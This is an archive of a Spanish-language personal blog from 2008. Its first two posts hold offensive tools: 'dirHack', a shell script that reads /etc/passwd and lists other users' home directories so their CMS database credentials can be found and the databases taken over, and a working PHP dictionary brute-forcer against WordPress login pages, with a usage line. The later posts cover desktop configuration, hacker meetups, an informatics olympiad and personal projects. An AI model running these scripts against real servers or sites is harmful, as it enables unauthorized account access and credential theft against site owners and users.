/home/zerial

dirHack

Zerial — Sun, 05 Oct 2008 01:05:08 +0000

El siguiente script sirve para hacer auditorias de seguridad en cuanto a los permisos en la estructura de directorios de nuestros servidores.

#!/bin/sh

# Written by Zerial & Pons

# McDonald’s Day …

# 21.34, Jun 13 2006 - Updated: 01.41, Jun 15 2006

# # # # # # # # # # # # # # # # # # # # # # # # # #

# ____ _ _ _ _

# | _ (_)_ __| | | | __ _ ___| | __

# | | | | | ‘__| |_| |/ _` |/ __| |/ /

# | |_| | | | | _ | (_| | (__| < # |____/|_|_| |_| |_|__,_|___|_|_

#

# # # # # # # # # # # # # # # # # # # # # # # # # #

version="1.0.2"

if [ $# -lt 2 ]

then

echo

echo "DirHack eXploit $version"

echo "This thing will list all sub-home directories"

echo "that are accesable by the user running the"

echo "script."

echo -e "tusage: $0 id output-file bz2|gz|text (default is text)"

echo -e "texample: $0 999 out bz2"

echo

break

else

echo > $2

if [ ! -w $2 ]

then

echo "File $2 doesn’t have write permissions"

break

fi

freedirs="public_html public_ftp etc tmp mail"

echo "Starting DirHack $version"

echo "DirHack eXploit $version" >> $2

for dir in $freedirs

do

for user in `awk -F‘:’ ‘ {printf $1 "n"} ‘ /etc/passwd`

do

userhome=`cat /etc/passwd |grep $user: |grep :$(id -u $user): |awk -F‘:’ ‘ {printf $6 "n"}’`

fulldir=$userhome/$dir

if [ `id -u $user` -gt $1 ]

then

if [ -d $fulldir ]

then

echo "" >> $2

echo "————————————————————-" >> $2

echo "User: $user" >> $2

echo "Directory: $fulldir" >> $2

echo "Size: `du -sh $fulldir`" >> $2

echo "" >> $2

ls -Rla $fulldir >> $2

fi

fi

done

done

case $3 in

bz2)

bzip2=`which bzip2`

if [ -x $bzip ]

then

$bzip2 -f $2

echo "File ready and compressed in $2.bz2"

else

echo "No exec permissions for bzip2 or bzip2 not found."

echo "File left uncompressed in $2"

fi;;

gz)

gzip=`which gzip`

if [ -x $gzip ]

then

$gzip -f $2

echo "File ready and compressed in $2.gz"

else

echo "No exec permissions for gzip or gzip not found."

echo "File left uncompressed in $2"

fi;;

*)

echo "File ready in $2";;

esac

Funcionamiento: Lee todos los usuarios desde /etc/passwd y luego, por cada usuario obtenido, ingresa al directorio public_html y lista, recursivamente, todos los directorios y subdirectorios. Generalmente, el usuario en el que corre apache se llama apache y obviamente, debe tener acceso de lectura a todos los directorios y ficheros que se desean mostrar, por ejemplo /home/user/public_html/index.php.

Si no tiene permisos de lectura para apache dificilmente se podria ingresar via web. Muchas veces, estos ficheros tienen permisos de escritura y de lectura y es cuando hay que actuar. Si no encontramos ficheros con permisos de escritura no importa, al menos tenemos acceso para leerlos. Por ejemplo, en los CMS mas populares como Wordpress, Joomla, etc. suelen tener un fichero de configuracion con el usuario y clave, en texto plato, de la base de datos con lo que podemos generar un script que nos permita ingresar y/o apoderarnos de esa base de datos.
Este script nos creara un listado, en txt (opcionalmente comprimido en gz o bz), con todos los ficheros y sus permisos, para que podamos indagar en la estructura de directorios.
Una forma de solucionar este problema es con chroot.

Web Login por fuerza bruta

Zerial — Sat, 04 Oct 2008 20:24:50 +0000

Wordpress no cuenta con un captcha por defecto ni tampoco con login throttling, o algo que limite los intentos de ingreso de usuario y clave para los usuarios, por lo que practicar fuerza bruta para ingresar como alguno de los usuarios registrados es algo que podemos intentar. Muchos sistemas de ingreso no cuentan con este tipo de proteccion o validacion, por lo que este escript no solo se puede usar contra wordpress.

Hemos escrito un pequeño programa en PHP que nos permitira hacer post al sistema de login de wordpress probando claves desde un diccionario de palabras.

< ?php

ini_set("memory_limit", "100M");

function crackSite($wordlist, $url, $user, $attemps = 0)

{

if($file = file($wordlist))

print "Read ".count($file)." words.n";

else

{

print "Can’t read word list file.n";

die();

}

$i = 0;

rtrim($fields_string,‘&’);

foreach($file as $word)

{

if(++$i%10 == 0)

print "Attempts: ".$i."/".count($file)." (".trim($word).")n";

$fields_string = "log=".$user."&pwd=".trim($word);

$ch = curl_init();

curl_setopt($ch,CURLOPT_URL,$url);

curl_setopt($ch,CURLOPT_POSTFIELDS,$fields_string);

curl_setopt($ch,CURLOPT_RETURNTRANSFER, true);

$result = md5( curl_exec($ch) );

if(!$oresult) $oresult = $result;

if($oresult != $result)

{

print "Password found: ".$word."n";

die();

}

curl_close($ch);

}

}

crackSite($argv[1], $argv[2], $argv[3]);

?>

Este script esta diseñado para correrlo desde la linea de comandos (php-cli) y su modo de uso es el siguiente:

$ php wp_cracker.php wordlist.txt http://sitio.com/wp-login.php Username

Notese que el script en ningun momento valida datos de entrada y salida, por lo que depende de la persona que lo ejecute que los parametros esten bien. Se ha probado este script con algunos sitios y ha funcionado, puede que para otros sitios sea necesario hacer algunas modificaciones. El primer parametro corresponde al fichero que contiene nuestro diccionario de palabras, el segundo a la URL que el script debe hacer post y el tercero al usuario.
Lo unico que debemos saber es el nombre de usuario que existe en el registro del sitio. Para intentar ingresar a otros sitios es necesario modificar el codigo fuente y cambiar los nombres de los campos.

Requerimientos: Curl y PHP.

Video tutorial:

Descargar video:
Mirror 1: Hardmodding (5M)

Configurando fluxbox

Zerial — Thu, 02 Oct 2008 03:19:11 +0000

Por fin me di el trabajo de enchular un poco la apariencia fisica de fluxbox en mi laptop.

Screenshot:

Software:

Entorno grafico: Fluxbox 1.1.1
Barra de iconos: wbar
Reproductor multimedia: mplayer
Barra lateral derecha: GKrellm
Navegador: Firefox (Gran Paradiso)
Cliente IM: emesene
Terminal: urxvt (rxvt unicode)
Sistema operativo: Archlinux

Como lograr la transparencia
La transparencia del menu, taskbar y titlebar se propia de fluxbox y se puede configurar haciendo clic derecho, Configuracion -> Transparecnias. La transparencia de GKRellm es un theme que se llama invisible.
Las ventanas transparentes se logran gracias a transset (hay que tener activado Composite en la configuracion de Xorg, salvo las tarjetas intel que viene incormorado en el modulo intel).

Sombras y efectos
Las sombras y los efectos tipo fade-out/in se logran usando xcompmgr.

Si te gusto el estilo que estoy usando y como lo tengo configurado, entocnes debes seguir leyendo.

(leer más…)

Hackmeeting ‘08

Zerial — Tue, 02 Sep 2008 22:10:27 +0000

Ya empezamos la organizacion y coordinacion para realizar el HM (Hackmeeting) correspondiente al año 2008, al igual que en años anteriores (hackPrendiz) cerca de esta fecha se reunen grupos de personas a organizar lo que se denomina “Encuentro de Hackers”, una instancia donde se reunen distintos grupos sociales y personas a compartir y a aprender.

0lafo redacto una carta de invitacion y motivacion para que las personas empiecen a coordinarse para lograr que este encuentro se realice con exito. Las fechas tentativas son a mediados de Noviembre y se espera que dure dos dias (un fin de semana). Como todos los años, esperamos que llegue gente de distintos lugares y con distintas cosas que aportar.

Convocatoria hackmeeting

Este mensaje es una invitación abierta para todos los usuarios, personas entusiastas de las tecnologías libres, libertad de la información y publico en general. De Organizar el hackmeeting Chile 2008, proponiendo y plagiando el trabajo, actividades y difusión del evento. como viene siendo habitual, desarrollar una red de actividades y encuentros entorno al hacktivismo, el aprendizaje, la informática y telemática y sus dimensiones sociales; en un fin de semana en el que se manifiesta la libertad de compartir, que es el hackmeeting (HM).

Para la organización y consulta se a dispuesto la siguiente lista de correo:

https://www.entodaspartes.org/mailman/listinfo/hackmeeting

El HM es un evento participativo en el que la dicotomía organizador/asistente se diluyen en la necesidad de autogestionar el encuentro colectivamente. Entendemos el HackMeeting como una red de actividades auto organizadas (talleres, charlas, mesas redondas, exposiciones, foros, etc.) que cualquier persona es libre de coordinar, presentar, difundir dentro del hackmeeting.

Pronto estara disponible una web con mas informacion, por mientras pueden unirse a la lista de discusion para la organizacion y corrdinacion.

Olimpiadas Nacionales de Informatica (ONI)

Zerial — Tue, 27 May 2008 18:53:19 +0000

La Olimpiada Nacional en Informática (ONI) es el concurso de informática para los estudiantes chilenos que se encuentren cursando enseñanza media durante el presente año o recién egresados. Los concursantes compiten individualmente, e intentan obtener la máxima puntuación resolviendo un conjunto de problemas informáticos durante las dos sesiones del concurso (online y presencial). Los problemas son algorítmicos y deben resolverse programando en un ordenador personal.

La ONI se organiza en Chile bajo los auspicios de la Ilustre Municipalidad de Buin.

El principal objetivo de este proyecto es contribuir a la educación de los jóvenes incorporando la informática como una pieza fundamental en su desarrollo, y además reconocer a aquellos que demuestren talento en el área para orientarlos y apoyarlos en su futura formación.

La ONI se realizará el día 21 de Junio de 14:00 a 18:00 horas en su primera fase en línea y el día 19 de Julio en su fase presencial (y final). Esta última se llevará a cabo en la comuna de Buin. Para la fase presencial, aquellos participantes provenientes de regiones podrán alojarse en Buin con un día de anterioridad.

Los temas a tratar en la ONI son los siguientes:

Estructura de Datos
Algoritmos de Ordenación
Algoritmos de Búsqueda
Grafos
Programación Dinámica
Mínimo Coste
Backtracking

Más info en onibuin

Taller/charla en el CDSL

Zerial — Fri, 04 Apr 2008 03:19:53 +0000

Se me ha invitado a dictar un taller o charla en el Centro de Difusion del Software Libre (CDSL) sobre el modelamiento de bases de datos utilizando herramientas libres. La fecha, que aun no esta decidida, sera mas o menos a principios de mayo y sera dictada en dos sesiones, una primera parte de Introduccion conceptual a SQL y una segunda parte donde se enseñara a modelar una base de datos.
El temario, la fecha y la hora aun no esta definido, pero a medida que pasen los dias ire actualizando la informacion que pueden encontrar en la siguiente direccion:

Wiki de tallers en el CDSL

Algunos proyectos …

Zerial — Thu, 27 Mar 2008 20:44:07 +0000

Hace algun tiempo que he estado integrandome y fundando algunos proyectos bastantes interesantes que me gustaria compartir:

Gibbio: Junto a Rodolfo Berrios comenzamos un proyecto patrocinado/auspiciado por Sergio Escoté, Gibbio es un proyecto de red social al mas estilo Yahoo! Answers o Askville de Amazon, en simples palabras es una Web 2.0 donde la gente podra compartir (buscar/encontrar) lo que necesite en base a preguntas y respuestas tageadas y categorizadas bajo un criterio colectivo, donde cada pregunta y respuesta podra ser valorada segun el criterio de quien la este leyendo. La idea es lanzar una beta en poco tiempo mas.
Hackreta: Hace mas o menos un año que me integre a Hackreta Hacklab y desde ese entonces han pasado muchas cosas, gente que se ah retirado, gente nueva … Actualmente estamos intentando sacar el Hacklab adelante, de apoco vamos trabajando y uniendo fuerzas los antiguos y los nuevos. Poco a poco nos vamos planteando metas a corto plazo para poder realizarlas y evaluamos como vamos avanzando, nuestro proximo objetivo es dar una buena presentacion/impresion en el Flisol (Festival Latinoamericano de instalacion de Software Libre) de este año mostrando algunas cosas que realizaremos como un Multimedia Center entre otras cosas.
KernelHouse: Este proyecto lleva solo algunos meses en pie y es algo que suena muy bonito pero que cuesta bastante llevar adelante. Kernel de núcleo y House de casa, la idea es formar una comunidad de organizaciones sin fines de lucro y libres, en esta casa existen varios colectivos o grupos sociales y ademas, muchas ideas creativas e integrantes. Actualmente en esta casa se hacen talleres/clases de Tango, lugar de ensayo para la compañia de teatro La manojo Teatro, el Hacklab Hackreta y recientemente un estudio de grabacion llamado Empty Records conocido como El lado oscuro. KernelHouse es una organizacion centralizada de todos los colectivos que participan en la casa de forma independiente.
Noubuntu: Aunque ya he recibido la critica de muchos (y algunas criticas muy destructivas), junto con corrideat decidimos continuar con esta ideologia y pensamiento respecto a lo que genera una distrbucion Linux tipo Ubuntu. Migramos el servidor, nos mudamos a Wordpress y lanzamos con mas fuerzas que nunca el nuevo sitio y ya hemos tenido varias visitas y varias criticas constructivas y destructivas.
Chevereto: Hace un tiempo me uní a este proyecto y actualmente soy el unico desarrollador, por lo que el avance avanza muy lento (tambien ocupo mi tiempo en otras cosas). Es un proyecto, tambien junto a Rodolfo Berrios, que trata de crear un motor de hosting de imagenes gratuito y libre, asi como existe Imageshack y otros hosting de imagenes, la idea es que este sea descargable y montable en cualquier servidor o pc. Actualmente es el motor de Godlike.

Fin de semana en el Hacklab: La antena

Zerial — Mon, 18 Feb 2008 13:29:33 +0000

El fin de semana recien pasado nos reunimos en el Hacklab para rearmar la antena y una estructura que nos permita dejarla fija.

Largas horas en el techo de la casa, buscando señales, fijando la antena y por obviamente tomando cerveza. Logramos conectarnos a una señal que según estudios anteriores era de 5mbps, con una “potencia” entre -76 y -82dBm logramos conectarnos y descargar a grandes velocidades. En un principio las descargas no bajaban de los 60kb/s y llegando a un tope de 140kb/s, poco a poco fuimos moviendo la antena y apuntandola mejor hasta lograr una conexion optima, descargando a una velocidad entre 250 y 300kb/s. Ya estabamos satisfechos y bajamos al laboratorio a actualizar los PC, a instalar, en fin, a “aprovechar” nuestro gran ancho de banda.
Durante la noche logramos logramos un record de descarga a 620kb/s , conectados con una velocidad de subida y bajada de 6000kbps.
Asi quedo la antena:

Wallpapers

Zerial — Fri, 15 Feb 2008 13:44:18 +0000

He recolectado algunos wallpapers para compartir con ustedes, espero que les gusten:

Pueden encontrar más wallpapers buscando allintitle: “Index of /wallpapers” en nuestro amigo Google.

Chevereto

Zerial — Thu, 14 Feb 2008 13:19:18 +0000

Si alguna vez pensaste en tener un hosting de imágenes corriendo en tu servidor con un script open source que te permite modificarlo como te dé la gana y compartir con personas de todo el mundo esta experiencia… Piensas igual que nosotros.

Con esta frase se presenta el sitio en desarrollo de Chevereto , un futuro sistema libre para el alojamiento de imagenes.

Ya deben conocer Imageshack (http://imageshack.us) o Godlike, el primero un sitio popular a nivel mundial de almacenamiento de imagenes y el segundo un sitio Chileno que a menos de un año de vida se esta popularizando en distintos paises.
Chevereto es un sistema que hace un par de meses se esta desarrollando pero que tambien hace mucho tiempo esta estancado y que ahora retomare con mucho mas animo. Espero poder tener lista una beta del sistema en menos de un mes, junto a Rodolfo Berrios (autor intelectual del asunto) y Pons (un desarrollador desmotivao’).

(leer más…)